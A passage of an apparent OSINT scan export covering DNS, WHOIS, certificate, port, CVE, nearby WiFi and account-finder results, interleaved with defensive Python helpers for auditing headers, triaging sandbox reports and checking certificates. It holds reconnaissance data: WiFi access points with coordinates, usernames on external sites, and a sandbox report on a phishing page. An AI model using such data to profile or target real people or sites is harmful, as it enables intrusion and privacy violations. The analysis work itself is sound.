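    "access-control-allow-origin": "*",
    "referrer-policy": "strict-origin-when-cross-origin",
    "cache-control": "public, max-age=14400, must-revalidate",
}

# Baseline: header -> predicate on its value; None means "must merely be present".
BASELINE = {
    "strict-transport-security": lambda v: "max-age=" in v.lower(),
    "content-security-policy": None,
    "x-content-type-options": lambda v: v.strip().lower() == "nosniff",
    "x-frame-options": lambda v: v.strip().upper() in {"DENY", "SAMEORIGIN"},
    "referrer-policy": lambda v: v.strip().lower()
    not in {"", "unsafe-url", "no-referrer-when-downgrade"},
}


def parse_permissions_policy(value):
    """Map each feature to its allowlist; an empty list means disabled everywhere."""
    policy = {}
    for item in value.split(","):
        item = item.strip()
        if not item:
            continue
        name, _, allow = item.partition("=")
        allow = allow.strip()
        if allow.startswith("(") and allow.endswith(")"):
            policy[name.strip()] = allow[1:-1].split()  # "()" -> [] (nobody)
        else:
            policy[name.strip()] = [allow]  # bare token such as * or self
    return policy


def audit_headers(headers):
    """Return missing/weak baseline headers plus analyst notes for one response."""
    h = {k.lower(): v for k, v in headers.items()}
    findings = {"missing": [], "weak": [], "notes": []}
    if h.get("cf-mitigated") == "challenge":
        # Cloudflare served its challenge page; these headers belong to the
        # interstitial, not to the origin application behind it.
        findings["notes"].append(
            "cloudflare challenge page: headers describe the interstitial, not the origin"
        )
    for name, check in BASELINE.items():
        if name not in h:
            findings["missing"].append(name)
        elif check is not None and not check(h[name]):
            findings["weak"].append(name)
    if h.get("access-control-allow-origin", "").strip() == "*":
        findings["notes"].append(
            "wildcard CORS: acceptable for public static assets, a finding on authenticated endpoints"
        )
    if "permissions-policy" in h:
        policy = parse_permissions_policy(h["permissions-policy"])
        findings["disabled_features"] = sorted(k for k, v in policy.items() if v == [])
    return findings


if __name__ == "__main__":
    for label, hdrs in (("challenge", CHALLENGE_RESPONSE), ("js-asset", JS_ASSET_RESPONSE)):
        print(label, json.dumps(audit_headers(hdrs), indent=2))
```

Neither captured response carries `Strict-Transport-Security` or `Content-Security-Policy`, but only the second response (a JavaScript asset served with `cf-cache-status: MISS`) actually reached the origin; the first is the challenge page, so its header set should be re-fetched once the challenge is cleared before anything is reported against the site.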
| 2023-05-12 03:08:50 | Affiliate - IP Address | No | DNS Look-aside | 1 | 0 | 3 | 0 | None | 34.148.97.117 | 34.148.97.127 |
| 2023-05-12 03:01:41 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.97.199): Search Engine<br>Last Activity: 0 days ago<br>Threat Level: 29 | 188.114.97.0/24 |
| 2023-05-12 03:18:54 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 4 | 0 | None | P2d8T7f2d$ (Net ID: 00:18:0A:DF:81:10) | 32.8608, -79.9746 |
| 2023-05-12 03:19:09 | Account on External Site | No | Account Finder | 0 | 0 | 6 | 0 | None | Donation Alerts (Category: business)<br>https://www.donationalerts.com/r/login | login |
| 2023-05-12 02:46:50 | SSL Certificate - Issued to | No | SSL Certificate Analyzer | 1 | 0 | 3 | 0 | None | C=US,ST=California,L=San Francisco,O=Netlify\, Inc,CN=*.netlify.app | 34.74.170.74 |
| 2023-05-12 03:23:02 | Account on External Site | No | Account Finder | 0 | 0 | 2 | 0 | None | ArmorGames (Category: gaming)<br>https://armorgames.com/user/ayhu | ayhu |
| 2023-05-12 02:54:41 | Raw Data from RIRs | No | Hybrid Analysis | 0 | 0 | 2 | 0 | None | [{u'subsystem': None, u'classification_tags': [u'phishing'], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': []}, u'total_processes': 3, u'threat_score': 100, u'compromised_hosts': [], u'environment_id': 110, u'major_os_version': None, u'submit_name': u'https://vijayvtrvv.github.io/Netflix-clone/', u'signatures': [{u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"\\Sessions\\1\\BaseNamedObjects\\IsoScope_b08_IESQMMUTEX_0_519"\n "Local\\InternetShortcutMutex"\n "{5312EE61-79E3-4A24-BFE1-132B85B23C3A}"\n "IsoScope_b08_IESQMMUTEX_0_303"\n "Local\\URLBLOCK_HASHFILESWITCH_MUTEX"\n "Local\\VERMGMTBlockListFileMutex"\n "UpdatingNewTabPageData"\n "IsoScope_b08_ConnHashTable<2824>_HashTable_Mutex"\n "IsoScope_b08_IE_EarlyTabStart_0xa10_Mutex"\n "IsoScope_b08_IESQMMUTEX_0_331"\n "Local\\ZonesCacheCounterMutex"\n "Local\\!BrowserEmulation!SharedMemory!Mutex"\n "IsoScope_b08_IESQMMUTEX_0_519"\n "Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_2824"\n "Local\\ZonesLockedCacheCounterMutex"\n "{66D0969A-1E86-44CF-B4EC-3806DDDA3B5D}"\n "Local\\URLBLOCK_DOWNLOAD_MUTEX"\n "\\Sessions\\1\\BaseNamedObjects\\UpdatingNewTabPageData"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\!BrowserEmulation!SharedMemory!Mutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\VERMGMTBlockListFileMutex"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"185.199.109.153:443"'}, 
{u'category': u'General', u'origin': u'Binary File', u'identifier': u'binary-16', u'name': u'Drops files marked as clean', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'Antivirus vendors marked dropped file "urlblockindex_1_.bin" as clean (type is "data")'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-0', u'name': u'Dropped files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"urlblockindex_1_.bin" has type "data"- [targetUID: N/A]\n "_1789619C-BEEA-11ED-BCF0-0800274498C4_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "search_2_.json" has type "JSON data"- [targetUID: N/A]\n "XNIF2NEQ.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\XNIF2NEQ.txt]- [targetUID: 00000000-00002824]\n "ILAV0GWD.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\ILAV0GWD.txt]- [targetUID: 00000000-00002824]\n "search__0633EE93-D776-472f-A0FF-E1416B8B2E3A_.ico" has type "MS Windows icon resource - 1 icon 32x32 32 bits/pixel"- [targetUID: N/A]\n "AYPRTCQD.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\AYPRTCQD.txt]- [targetUID: 00000000-00002764]\n "YD44M3BI.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\YD44M3BI.txt]- [targetUID: 00000000-00002764]\n "en-US.4" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Internet Explorer\\DomainSuggestions\\en-US.4]- [targetUID: 00000000-00002824]\n "favicon_3_.ico" has type "MS Windows icon resource - 1 icon 32x32 32 bits/pixel"- [targetUID: N/A]\n "_0FE65957-BEEA-11ED-BCF0-0800274498C4_.dat" has type "Composite Document File V2 Document 
Cannot read section info"- [targetUID: N/A]\n "~DF0F7147F21451F5D5.TMP" has type "data"- Location: [%TEMP%\\~DF0F7147F21451F5D5.TMP]- [targetUID: 00000000-00002824]\n "RecoveryStore._0FE65955-BEEA-11ED-BCF0-0800274498C4_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "5SKQI1K8.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\5SKQI1K8.txt]- [targetUID: 00000000-00002824]\n "~DFC76CE97BABDC83A2.TMP" has type "data"- Location: [%TEMP%\\~DFC76CE97BABDC83A2.TMP]- [targetUID: 00000000-00002824]\n "favicon_2_.ico" has type "MS Windows icon resource - 1 icon 32x32 32 bits/pixel"- [targetUID: N/A]\n "D4LFXWPK.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\D4LFXWPK.txt]- [targetUID: 00000000-00002824]\n "0HR9FPNL.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\0HR9FPNL.txt]- [targetUID: 00000000-00002824]\n "~DF2006E49898172CAF.TMP" has type "data"- Location: [%TEMP%\\~DF2006E49898172CAF.TMP]- [targetUID: 00000000-00002824]'}, {u'category': u'Network Related', u'origin': u'File/Memory', u'identifier': u'string-3', u'name': u'Found potential URL in binary/memory', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 2, u'description': u'Pattern match: "MUID0C360FC979EA6DFB10321D1978A66CCEmsn.com/102542014812163109822931516121831019767*"\n Pattern match: "https://vijayvtrvv.github.io"\n Pattern match: "https://vijayvtrvv.github.io/Netflix-clone/"\n Pattern match: "isdomainmigratedtruewww.msn.com/10257999334403105598531500496831019767*"\n Pattern match: "MUIDB095C7AB1B9DC6C63374A6861B8586DD3ieonline.microsoft.com/921641914812163109822931156746831019767*"\n Pattern match: 
"SUIDMmicrosoft.com/921640589920003101987531156746831019767*MUID095C7AB1B9DC6C63374A6861B8586DD3microsoft.com/102541914812163109822931156746831019767*_EDGE_V1microsoft.com/921641914812163109822931172371831019767*SRCHDAF=NOFORMmicrosoft.com/10243323789440310"\n Pattern match: "SUIDMmicrosoft.com/921640589920003101987531156746831019767*MUID095C7AB1B9DC6C63374A6861B8586DD3microsoft.com/102541914812163109822931156746831019767*SRCHDAF=NOFORMmicrosoft.com/102433237894403108561027971357230938743*SRCHUIDV=2&GUID=426377958C8445E3B4EA694"\n Pattern match: "SUIDMmicrosoft.com/921640589920003101987531156746831019767*SRCHDAF=NOFORMmicrosoft.com/102433237894403108561027971357230938743*SRCHUIDV=2&GUID=426377958C8445E3B4EA69482BD0E747&dmnchg=1microsoft.com/102433237894403108561027971357230938743*SRCHUSRDOB=2022013"\n Pattern match: "www.msn.com/"\n Heuristic match: "ijayvtrvv.github.io"\n Pattern match: "vijayvtrvv.github.io/Netflix-clone/"\n Pattern match: "vv.github.io/Netflix-clone/"\n Heuristic match: "api.ipify.org"\n Heuristic match: "checkip.amazonaws.com"\n Heuristic match: "checkip.dyndns.com"\n Heuristic match: "checkip.dyndns.org"\n Heuristic match: "checkip.org"\n Heuristic match: "checkmyip.com"\n Heuristic match: "cmyip.com"\n Heuristic match: "curlmyip.com"\n Heuristic match: "findmyip.org"\n Heuristic match: "formyip.com"\n Heuristic match: "geoip.co.uk"\n Heuristic match: "geoiptool.com"\n Heuristic match: "getmyip.co.uk"\n Heuristic match: "getmyip.org"\n Heuristic match: "icanhazip.com"\n Heuristic match: "ifconfig.me"\n Heuristic match: "ip-addr.es"\n Heuristic match: "ip-address.domaintools.com"\n Heuristic match: "ip-api.com"\n Heuristic match: "ip-score.com"\n Heuristic match: "ip.jsontest.com"\n Heuristic match: "ip.xss.ru"\n Heuristic match: "ip4.telize.com"\n Heuristic match: "ipchicken.com"\n Heuristic match: "ipecho.net"\n Heuristic match: "ipinfo.info"\n Heuristic match: "ipinfo.io"\n Heuristic match: "ipleak.net"\n Heuristic match: "ipligence.com"\n 
Heuristic match: "knowmyip.com"\n Heuristic match: "maxmind.com"\n Heuristic match: "meineipadresse.de"\n Heuristic match: "myexternalip.com"\n Heuristic match: "myip.dnsomatic.com"\n Heuristic match: "myip.ht"\n Heuristic match: "myip.nl"\n Heuristic match: "myip.opendns.com"\n Heuristic match: "myipaddress.com"\n Heuristic match: "queryip.net"\n Heuristic match: "showmyip.com"\n Heuristic match: "showmyipaddress.com"\n Heuristic match: "tracemyip.org"\n Heuristic match: "whatismyip.akamai.com"\n Heuristic match: "whatismyip.ca"\n Heuristic match: "whatismyip.com"\n Heuristic match: "whatismyip.everdot.org"\n Heuristic match: "whatismyipaddress.com"\n Heuristic match: "whatsmyip.net"\n Heuristic match: "whatsmyip.org"\n Heuristic match: "whatsmyipaddress.org"\n Heuristic match: "whatsmypublicip.com"\n Heuristic match: "wtfismyip.com"\n Heuristic match: "hispeed.ch"\n Pattern match: "http://www.windows.com/pctv"\n Pattern match: "http://go.microsoft.com/fwlink/?linkid=53081"\n Pattern match: "www.microsoft.com/extender/help"\n Pattern match: "http://go.microsoft.com/fwlink/?LinkId=30564-http://go.microsoft.com/fwlink/?LinkId=145764-http://go.microsoft.com/fwlink/?LinkId=145764-http://go.microsoft.com/fwlink/?LinkId=145764-http://go.microsoft.com/fwlink/?LinkId=145764-http://go.microsoft.com/fwl"\n Pattern match: "http://go.microsoft.com/fwlink/?LinkId=70599"\n Pattern match: "http://go.microsoft.com/fwlink/?LinkId=145837"\n Pattern match: "http://go.microsoft.com/fwlink/?LinkID=57190"\n Pattern match: "http://go.microsoft.com/fwlink/?LinkId=145765"\n Heuristic match: "Example: computer.fabrikam.com"\n Pattern match: "vista.gallery.microsoft.com/vista/SideShow.aspx"\n Pattern match: "http://www.icra.org/vocabulary/"\n Pattern match: "wmploc.dll/Offline_Buy.htm\'res://wmploc.dll/Offline_MediaGuide.htm*res://wmploc.dll/Offline_Subscriptions.htm"\n Pattern match: "http://go.microsoft.com/fwlink/?LinkId=32146res://wmploc.dll/ICW_ErrorPage.htm"\n Pattern match: 
"wmploc.dll/Service_Initial.htm"\n Pattern match: "wmploc.dll/Error_ServiceInfo.htm\'res://wmploc.dll/Offline_InfoCenter.htm&res://wmploc.dll/Offline_AlbumInfo.htm"\n Pattern match: "wmploc.dll/Service_NoFunc.htm%res://wmploc.dll/Service_No_Local.htm"\n Pattern match: "wmploc.dll/RT_IMAGE/ServiceLarge.png*res://wmploc.dll/RT_IMAGE/ServiceSmall.png*res://wmploc.dll/RT_IMAGE/ServiceSmall.png"\n Pattern match: "wmploc.dll/Blocked_AlbumInfo.htm&res://wmploc.dll/Blocked_AlbumInfo.htm,http://go.microsoft.com/fwlink/?LinkId=70183\'res:// | 185.199.109.153 |
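The two Hybrid Analysis rows above (the riverside.fm report with verdict "no specific threat", and the Netflix-clone report tagged `phishing` with `threat_score` 100) store the sandbox report as a Python 2 repr (`u'...'` strings, `None`, `True`/`False`), which `json.loads` rejects. The following is an added example, not scanner code: it parses such a blob with `ast.literal_eval`, falls back to JSON for exports that really are JSON, and reduces each report to the fields an analyst sorts on. The sample blob is constructed in the shape of the two captured reports; the second report's `verdict` is deliberately omitted because the captured row is truncated before that field, and the code treats a missing verdict as unknown rather than guessing.

```python
"""Triage Hybrid Analysis report blobs captured in a scan export (added example)."""
import ast
import json

# Constructed sample in the same shape as the two captured reports (trimmed).
# The second entry carries no 'verdict' key, mirroring the truncated row.
SAMPLE_BLOB = (
    "[{u'classification_tags': [], u'threat_score': None, u'verdict': u'no specific threat', "
    "u'submit_name': u'http://riverside.fm/', u'av_detect': 0, "
    "u'hosts': [u'172.67.134.250', u'172.67.134.250', u'185.199.111.153'], "
    "u'sha256': u'2dd0c093bda9d915f5043f2e827c446b6911c760e46c3e11de607a05c686856b', "
    "u'mitre_attcks': [{u'attck_id': u'T1105', u'technique': u'Ingress Tool Transfer', "
    "u'malicious_identifiers_count': 0}], u'interesting': False}, "
    "{u'classification_tags': [u'phishing'], u'threat_score': 100, "
    "u'submit_name': u'https://vijayvtrvv.github.io/Netflix-clone/', u'av_detect': 0, "
    "u'hosts': [u'185.199.109.153'], u'sha256': None, u'mitre_attcks': [], u'interesting': True}]"
)


def parse_report_blob(blob):
    """Parse a Python-repr (or JSON) report dump into a list of report dicts."""
    blob = blob.strip()
    try:
        data = ast.literal_eval(blob)  # safe for u'' prefixes, None, True/False
    except (ValueError, SyntaxError):
        data = json.loads(blob)  # genuine JSON exports (null/true/false)
    return data if isinstance(data, list) else [data]


def triage(report):
    """Reduce one report to the fields used for ranking and IOC extraction."""
    tags = [str(t) for t in report.get("classification_tags") or []]
    score = report.get("threat_score")
    # Severity rule is this example's own: a high sandbox score or an explicit
    # phishing tag is enough to pull the report to the top of the queue.
    severity = "high" if (score or 0) >= 70 or "phishing" in tags else "info"
    return {
        "target": report.get("submit_name"),
        "severity": severity,
        "threat_score": score,
        "verdict": report.get("verdict"),  # None when the row was truncated
        "tags": tags,
        "sha256": report.get("sha256"),
        "hosts": sorted(set(report.get("hosts") or [])),  # the dump repeats contacts
        "attck": sorted(
            {m["attck_id"] for m in report.get("mitre_attcks") or [] if m.get("attck_id")}
        ),
    }


def triage_blob(blob):
    """Parse and rank: high severity first, then by score, then by target."""
    rows = [triage(r) for r in parse_report_blob(blob)]
    rows.sort(key=lambda r: (r["severity"] != "high", -(r["threat_score"] or 0), r["target"] or ""))
    return rows


if __name__ == "__main__":
    for row in triage_blob(SAMPLE_BLOB):
        print(json.dumps(row, indent=2))
```

`ast.literal_eval` is the right tool here rather than `eval`: the blob is attacker-influenced text (URLs and strings pulled from a sandboxed sample), and `literal_eval` only builds Python literals. The contacted-host list is deduplicated because the dump lists the same address once per connection.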
| 2023-05-12 03:03:42 | Internet Name | No | DNS Resolver | 0 | 0 | 3 | 0 | None | oldfluid.battleb0t.xyz | [{u'request_config': {u'headers': {u'User-Agent': u'Mozilla/5.0'}}, u'target': u'http://oldfluid.battleb0t.xyz', u'http_status': 301, u'plugins': {u'Country': {u'string': [u'RESERVED'], u'module': [u'ZZ']}, u'HTTPServer': {u'string': [u'cloudflare']}, u'RedirectLocation': {u'string': [u'https://oldfluid.battleb0t.xyz/']}, u'UncommonHeaders': {u'string': [u'report-to,nel,cf-cache-status,cf-ray,alt-svc']}, u'IP': {u'string': [u'172.64.80.1']}}}, {}] |
| 2023-05-12 03:18:58 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | linksys (Net ID: 00:04:5A:F7:C5:5E) | 33.336199,-111.89446440830702 |
| 2023-05-12 02:44:35 | SSL Certificate - Raw Data | No | Certificate Transparency | 1 | 0 | 1 | 0 | None | Certificate:
Data:
Version: 3 (0x2)
Serial Number:
04:15:41:ea:93:cd:8d:62:0f:07:0f:be:37:47:74:c1:ad:1b
Signature Algorithm: sha256WithRSAEncryption
Issuer: C=US, O=Let's Encrypt, CN=R3
Validity
Not Before: Nov 17 17:26:26 2022 GMT
Not After : Feb 15 17:26:25 2023 GMT
Subject: CN=panel.battleb0t.xyz
Subject Public Key Info:
Public Key Algorithm: rsaEncryption
RSA Public-Key: (4096 bit)
Modulus:
00:aa:4d:69:12:67:d1:ef:14:86:20:9d:cf:2c:a8:
0d:c9:a7:6c:06:2b:6c:f8:9e:1f:f7:5b:41:e3:d6:
87:ca:57:bb:98:07:35:18:67:8f:28:74:6a:04:77:
89:a0:80:85:fc:4d:2e:7a:12:ee:d9:55:9b:e8:51:
03:88:3d:06:0a:14:47:b6:c6:bf:e2:f2:6e:38:57:
77:d8:da:10:9f:18:48:30:90:76:66:83:1b:18:b6:
6d:f9:38:58:a1:cc:7b:d2:96:34:23:9b:ea:85:2c:
bb:61:4a:ef:9a:58:1e:2d:73:fc:eb:20:c5:37:d4:
7c:8e:77:66:2d:b6:0a:4e:0d:e0:f4:1d:87:9f:f3:
39:d7:d9:45:03:a6:8f:40:08:8a:3e:d5:15:b6:01:
8a:08:27:45:ff:cb:af:e5:d1:fd:28:cb:df:75:d3:
f7:db:3d:e9:43:0c:e5:b6:28:89:d2:ba:63:6c:e0:
ac:03:c0:49:9f:2c:e6:11:96:03:1a:33:a3:63:63:
dc:3b:1c:a8:9b:0f:00:ea:cb:bf:0c:39:fd:1c:40:
ab:3a:92:ca:b0:90:5c:21:ed:f1:8e:4f:9e:e7:92:
92:53:94:1d:fa:e2:36:84:fa:2a:17:63:6d:d0:c9:
16:92:48:c8:82:19:57:63:48:56:6e:6a:2e:34:87:
cc:7c:79:cf:43:dc:a4:a2:fb:e4:06:17:02:db:ef:
92:10:48:04:d1:04:89:aa:65:ee:9d:e2:a1:cd:ce:
9c:27:f6:46:3e:9e:91:90:6e:12:78:d2:cd:5e:a3:
75:48:b4:82:f5:c9:29:da:c5:bb:ac:87:af:95:fa:
f8:49:db:fe:e5:df:04:7e:92:10:6e:c8:d7:7b:93:
ef:de:5b:4f:7a:70:41:0c:59:d9:04:5e:26:57:3d:
65:af:57:00:3d:40:e4:ec:3b:92:38:0a:d1:a5:20:
31:40:89:48:9a:58:46:06:1e:56:4f:e5:25:e6:f5:
33:d9:bb:68:90:99:70:c6:a1:93:5a:22:c1:e3:ee:
da:ef:45:a4:37:18:4c:33:42:7e:6f:07:01:85:ed:
36:f3:3f:be:f6:6a:d9:3e:fe:ad:4c:8d:18:3e:0e:
49:d9:7a:95:04:47:e8:2c:a9:fe:24:7a:53:d0:af:
27:b2:85:89:f7:05:df:d8:9a:0d:56:23:cd:ee:11:
cb:31:f6:4e:3f:af:22:51:d3:a0:8f:a4:52:72:6f:
12:6d:6d:c2:7a:fe:c4:93:c1:f6:23:a9:9a:2b:35:
9d:df:e3:e9:99:57:fb:f5:e8:d9:e8:4d:a5:ec:7e:
dd:22:c5:d3:4f:c7:2d:bf:e4:09:ee:6f:cb:b6:13:
f8:ae:73
Exponent: 65537 (0x10001)
X509v3 extensions:
X509v3 Key Usage: critical
Digital Signature, Key Encipherment
X509v3 Extended Key Usage:
TLS Web Server Authentication, TLS Web Client Authentication
X509v3 Basic Constraints: critical
CA:FALSE
X509v3 Subject Key Identifier:
CE:03:E9:CB:9A:4D:5E:BB:32:45:93:FC:78:CC:A3:7F:08:26:B1:40
X509v3 Authority Key Identifier:
keyid:14:2E:B3:17:B7:58:56:CB:AE:50:09:40:E6:1F:AF:9D:8B:14:C2:C6
Authority Information Access:
OCSP - URI:http://r3.o.lencr.org
CA Issuers - URI:http://r3.i.lencr.org/
X509v3 Subject Alternative Name:
DNS:panel.battleb0t.xyz
X509v3 Certificate Policies:
Policy: 2.23.140.1.2.1
Policy: 1.3.6.1.4.1.44947.1.1.1
CPS: http://cps.letsencrypt.org
CT Precertificate Poison: critical
NULL
Signature Algorithm: sha256WithRSAEncryption
ac:60:96:91:2c:ed:62:e3:68:ab:ed:e4:c1:61:0e:e3:90:31:
8e:31:a9:4b:46:c3:8d:c5:e0:8d:6a:1f:71:38:56:82:9c:31:
ee:2d:1e:c2:98:27:b8:9a:55:a7:78:ac:42:82:80:5a:1a:3f:
46:90:d5:fc:3f:8e:74:b4:e7:d4:76:72:66:4f:64:e7:54:46:
71:43:bb:42:84:c6:ab:aa:25:38:1c:ad:60:ca:08:fb:2f:af:
6b:e9:0e:62:15:97:73:27:ee:39:ae:11:a2:19:fc:87:93:31:
01:c6:c2:bd:5e:38:b1:3d:e5:5a:62:7e:60:8c:17:d0:3e:6e:
32:57:eb:54:28:cc:4a:0d:97:2a:6c:f6:c3:5d:8d:fc:27:99:
db:56:f3:bf:e2:b4:48:94:fb:dc:8e:3d:27:43:4b:4a:90:a7:
5c:68:44:45:9f:de:e6:ec:0b:1d:70:e4:c8:83:60:12:96:7f:
ec:53:10:4f:3d:05:06:c8:b9:0f:d6:87:14:c3:ad:47:7e:54:
4f:22:a7:90:86:28:be:cb:1b:db:56:26:75:23:0a:0e:be:e0:
7a:ad:c8:af:3f:81:81:ab:65:ab:91:6f:ac:eb:f0:ed:29:05:
3a:74:6a:ac:41:f3:d3:ea:c7:b8:d2:98:d6:a4:8f:dc:f6:59:
7a:f9:d5:0f
| battleb0t.xyz |
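The Certificate Transparency row above records a precertificate for panel.battleb0t.xyz (the `CT Precertificate Poison` extension marks it as the log entry, not the leaf a server presents) whose validity ended on Feb 15 2023, nearly three months before the scan. The following is an added example, not part of the scan export: it pulls subject, SANs, validity window and the poison flag out of an openssl-style text dump and reports whether the certificate was valid at the scan time for a given hostname. `CERT_TEXT` is a constructed excerpt in the same layout as the captured dump (key material omitted), `SCAN_TIME` is that row's timestamp, and the wildcard matching goes beyond this row so the same check also applies to entries such as the `*.netlify.app` certificate recorded above.

```python
"""Check a CT-logged certificate's validity against a scan date (added example)."""
import re
from datetime import datetime, timezone

# Constructed excerpt in the layout of the captured openssl text dump.
CERT_TEXT = """\
Certificate:
    Data:
        Version: 3 (0x2)
        Issuer: C=US, O=Let's Encrypt, CN=R3
        Validity
            Not Before: Nov 17 17:26:26 2022 GMT
            Not After : Feb 15 17:26:25 2023 GMT
        Subject: CN=panel.battleb0t.xyz
        X509v3 extensions:
            X509v3 Subject Alternative Name:
                DNS:panel.battleb0t.xyz
            CT Precertificate Poison: critical
                NULL
"""
# Timestamp of the Certificate Transparency row on this page.
SCAN_TIME = datetime(2023, 5, 12, 2, 44, 35, tzinfo=timezone.utc)


def _parse_openssl_time(s):
    """openssl pads single-digit days with a space ("Nov  7 ..."); normalise it."""
    return datetime.strptime(" ".join(s.split()), "%b %d %H:%M:%S %Y GMT").replace(
        tzinfo=timezone.utc
    )


def parse_cert_text(text):
    """Extract the fields an analyst triages from an `openssl x509 -text` dump."""
    nb = re.search(r"Not Before\s*:\s*(.+)", text)
    na = re.search(r"Not After\s*:\s*(.+)", text)
    cn = re.search(r"Subject:\s*.*?CN\s*=\s*([^,\n]+)", text)
    san = re.search(r"Subject Alternative Name:\s*(DNS:[^\n]+)", text)
    names = []
    if san:
        names = [n.strip()[4:] for n in san.group(1).split(",") if n.strip().startswith("DNS:")]
    return {
        "subject_cn": cn.group(1).strip() if cn else None,
        "dns_names": names,
        "not_before": _parse_openssl_time(nb.group(1)),
        "not_after": _parse_openssl_time(na.group(1)),
        # A poisoned precert is what the CA submitted to the CT log; the served
        # leaf, if any, is a different (unpoisoned) certificate.
        "is_precert": "CT Precertificate Poison" in text,
    }


def _name_matches(pattern, hostname):
    """RFC 6125-style match: a wildcard covers exactly one leftmost label."""
    pattern, hostname = pattern.lower(), hostname.lower()
    if pattern.startswith("*."):
        return hostname.count(".") == pattern.count(".") and hostname.endswith(pattern[1:])
    return pattern == hostname


def assess(cert, when, hostname):
    """Validity and name-match verdict for `hostname` at instant `when`."""
    if isinstance(when, str):
        when = datetime.fromisoformat(when)
    problems = []
    if when < cert["not_before"]:
        problems.append("not yet valid at scan time")
    if when > cert["not_after"]:
        problems.append("expired %d days before scan" % (when - cert["not_after"]).days)
    name_ok = any(_name_matches(n, hostname) for n in cert["dns_names"])
    if not name_ok:
        problems.append("hostname not covered by SAN")
    notes = []
    if cert["is_precert"]:
        notes.append("CT precertificate: proves issuance was logged, not that the host serves it")
    return {
        "host": hostname,
        "time_valid": not any(p.startswith(("expired", "not yet")) for p in problems),
        "name_ok": name_ok,
        "valid": not problems,
        "is_precert": cert["is_precert"],
        "problems": problems,
        "notes": notes,
    }


if __name__ == "__main__":
    print(assess(parse_cert_text(CERT_TEXT), SCAN_TIME, "panel.battleb0t.xyz"))
```

For this row the verdict is "expired 85 days before scan": the CT entry shows that panel.battleb0t.xyz existed and was issued a certificate in late 2022, which is useful for attribution, but it is not evidence of what the host served on the scan date. A live TLS connection to the host is needed for that.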
| 2023-05-12 03:13:02 | Malicious Co-Hosted Site | Yes | OpenPhish | 0 | 0 | 3 | 0 | None | OpenPhish [00-evan.github.io]<br>https://www.openphish.com/feed.txt | 00-evan.github.io |
| 2023-05-12 02:54:38 | Open TCP Port | No | Censys | 0 | 0 | 3 | 0 | None | 172.67.168.252:80 | 172.67.168.252 |
| 2023-05-12 03:06:53 | Vulnerability - CVE Low | Yes | Tool - testssl.sh | 0 | 1 | 2 | 0 | None | CVE-2013-0169<br>https://nvd.nist.gov/vuln/detail/CVE-2013-0169<br>Score: 2.6<br>Description: The TLS protocol 1.1 and 1.2 and the DTLS protocol 1.0 and 1.2, as used in OpenSSL, OpenJDK, PolarSSL, and other products, do not properly consider timing side-channel attacks on a MAC check requirement during the processing of malformed CBC padding, which allows remote attackers to conduct distinguishing attacks and plaintext-recovery attacks via statistical analysis of timing data for crafted packets, aka the "Lucky Thirteen" issue. | 185.199.111.153 |
| 2023-05-12 03:18:53 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | TheCs_Kids (Net ID: 00:02:6F:F8:F3:36) | 39.0469, -77.4903 |
| 2023-05-12 02:59:47 | Affiliate - Domain Whois | No | Whois | 3 | 0 | 4 | 0 | None | Domain Name: KEYUBU.NET
Registry Domain ID: 2292564483_DOMAIN_NET-VRSN
Registrar WHOIS Server: whois.nicproxy.com
Registrar URL: http://https://nicproxy.com/
Updated Date: 2022-07-15T17:58:49Z
Creation Date: 2018-07-31T21:39:25Z
Registry Expiry Date: 2024-07-31T21:39:25Z
Registrar: Nics Telekomunikasyon A.S.
Registrar IANA ID: 1454
Registrar Abuse Contact Email: abuse@nicproxy.com
Registrar Abuse Contact Phone: +90 212 213 2963
Domain Status: ok https://icann.org/epp#ok
Name Server: LLOYD.NS.CLOUDFLARE.COM
Name Server: MOLLY.NS.CLOUDFLARE.COM
DNSSEC: unsigned
URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/
>>> Last update of whois database: 2023-05-12T02:59:31Z <<<
For more information on Whois status codes, please visit https://icann.org/epp
NOTICE: The expiration date displayed in this record is the date the
registrar's sponsorship of the domain name registration in the registry is
currently set to expire. This date does not necessarily reflect the expiration
date of the domain name registrant's agreement with the sponsoring
registrar. Users may consult the sponsoring registrar's Whois database to
view the registrar's reported date of expiration for this registration.
